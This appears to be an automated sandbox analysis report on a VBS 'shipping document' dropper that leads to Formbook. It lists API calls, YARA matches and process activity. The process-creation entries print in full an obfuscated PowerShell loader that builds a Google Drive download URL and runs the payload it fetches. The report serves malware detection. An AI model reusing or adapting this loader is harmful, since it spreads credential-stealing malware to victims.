SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202535C0 NtCreateMutant,LdrInitializeThunk, 12_2_202535C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_20252C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_20252DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253010 NtOpenDirectoryObject, 12_2_20253010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253090 NtSetValueKey, 12_2_20253090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20254340 NtSetContextThread, 12_2_20254340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20254650 NtSuspendThread, 12_2_20254650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202539B0 NtGetContextThread, 12_2_202539B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AB0 NtWaitForSingleObject, 12_2_20252AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AF0 NtWriteFile, 12_2_20252AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AD0 NtReadFile, 12_2_20252AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252B60 NtClose, 12_2_20252B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BA0 NtEnumerateValueKey, 12_2_20252BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252B80 NtQueryInformationFile, 12_2_20252B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BE0 NtQueryValueKey, 12_2_20252BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BF0 NtAllocateVirtualMemory, 12_2_20252BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C00 NtQueryInformationProcess, 12_2_20252C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C60 NtCreateKey, 12_2_20252C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CA0 NtQueryInformationToken, 12_2_20252CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CF0 NtOpenProcess, 12_2_20252CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CC0 NtQueryVirtualMemory, 12_2_20252CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D30 NtUnmapViewOfSection, 12_2_20252D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D00 NtSetInformationFile, 12_2_20252D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253D10 NtOpenProcessToken, 12_2_20253D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D10 NtMapViewOfSection, 12_2_20252D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253D70 NtOpenThread, 12_2_20253D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DB0 NtEnumerateKey, 12_2_20252DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DD0 NtDelayExecution, 12_2_20252DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252E30 NtWriteVirtualMemory, 12_2_20252E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252EA0 NtAdjustPrivilegesToken, 12_2_20252EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252E80 NtReadVirtualMemory, 12_2_20252E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252EE0 NtQueueApcThread, 12_2_20252EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F30 NtCreateSection, 12_2_20252F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F60 NtCreateProcessEx, 12_2_20252F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FA0 NtQuerySection, 12_2_20252FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FB0 NtResumeThread, 12_2_20252FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F90 NtProtectVirtualMemory, 12_2_20252F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FE0 NtCreateFile, 12_2_20252FE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF88799C342 3_2_00007FF88799C342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF88799B596 3_2_00007FF88799B596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_044EF258 9_2_044EF258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_044EFB28 9_2_044EFB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_044EEF10 9_2_044EEF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D70E9 12_2_202D70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DF0E0 12_2_202DF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF0CC 12_2_202CF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20210100 12_2_20210100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202EB16B 12_2_202EB16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2025516C 12_2_2025516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E01AA 12_2_202E01AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022B1B0 12_2_2022B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D81CC 12_2_202D81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D132D 12_2_202D132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D34C 12_2_2020D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DA352 12_2_202DA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2026739A 12_2_2026739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E03E6 12_2_202E03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DF43F 12_2_202DF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D2446 12_2_202D2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CE4F6 12_2_202CE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D7571 12_2_202D7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BD5B0 12_2_202BD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E0591 12_2_202E0591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023C6E0 12_2_2023C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D16CC 12_2_202D16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220770 12_2_20220770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20244750 12_2_20244750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DF7B0 12_2_202DF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021C7C0 12_2_2021C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D800 12_2_2028D800
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20222840 12_2_20222840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022A840 12_2_2022A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202068B8 12_2_202068B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202238E0 12_2_202238E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E8F0 12_2_2024E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20236962 12_2_20236962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20229950 12_2_20229950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B950 12_2_2023B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202229A0 12_2_202229A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202EA9A6 12_2_202EA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20293A6C 12_2_20293A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFA49 12_2_202DFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D7A46 12_2_202D7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20265AA0 12_2_20265AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BDAAC 12_2_202BDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021EA80 12_2_2021EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CDAC6 12_2_202CDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFB76 12_2_202DFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DAB40 12_2_202DAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023FB80 12_2_2023FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2025DBF9 12_2_2025DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D6BD7 12_2_202D6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20299C32 12_2_20299C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220C00 12_2_20220C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0CB5 12_2_202C0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20210CF2 12_2_20210CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFCF2 12_2_202DFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022AD00 12_2_2022AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D7D73 12_2_202D7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20223D40 12_2_20223D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D1D5A 12_2_202D1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20238DBF 12_2_20238DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021ADE0 12_2_2021ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023FDC0 12_2_2023FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DEE26 12_2_202DEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220E59 12_2_20220E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20229EB0 12_2_20229EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20232E90 12_2_20232E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DCE93 12_2_202DCE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DEEDB 12_2_202DEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20262F28 12_2_20262F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20240F30 12_2_20240F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFF09 12_2_202DFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20294F40 12_2_20294F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DFFB1 12_2_202DFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221F92 12_2_20221F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022CFE0 12_2_2022CFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212FC8 12_2_20212FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20255130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20267E54 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2028EA12 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2029F290 appears 105 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2020B970 appears 266 times
Source: shipping document.vbs Initial sample: Strings found which are bigger than 50
Source: amsi32_5852.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@22/10@6/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Finindstillingernes119.Uni
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ztt1tkp.iey.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6856
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5852
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: shipping document.vbs ReversingLabs: Detection: 31%
Source: shipping document.vbs Virustotal: Detection: 40%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen 